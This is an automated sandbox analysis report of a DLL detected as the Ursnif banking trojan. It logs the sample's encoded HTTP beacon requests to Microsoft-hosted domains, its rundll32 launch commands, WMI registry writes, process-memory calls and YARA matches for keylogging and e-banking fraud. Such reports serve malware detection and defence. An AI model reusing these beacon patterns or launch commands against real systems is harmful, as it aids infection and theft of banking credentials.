                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.116.82:443 -> 192.168.2.4:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.183.162:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.82:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.66:443 -> 192.168.2.4:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.210:443 -> 192.168.2.4:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.194:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.226:443 -> 192.168.2.4:49862 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2E5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E31D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E333CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E31B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E32A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E30E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2E5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E31D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E333CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E31B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E33FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E32A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E33FB98
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E30E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04974C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497AF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04972B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDB149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04975D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0497B149 NtQueryVirtualMemory,
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Source: 616412739e268.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@24/10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD4A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6464
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.880000220.0000000004643000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbJv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
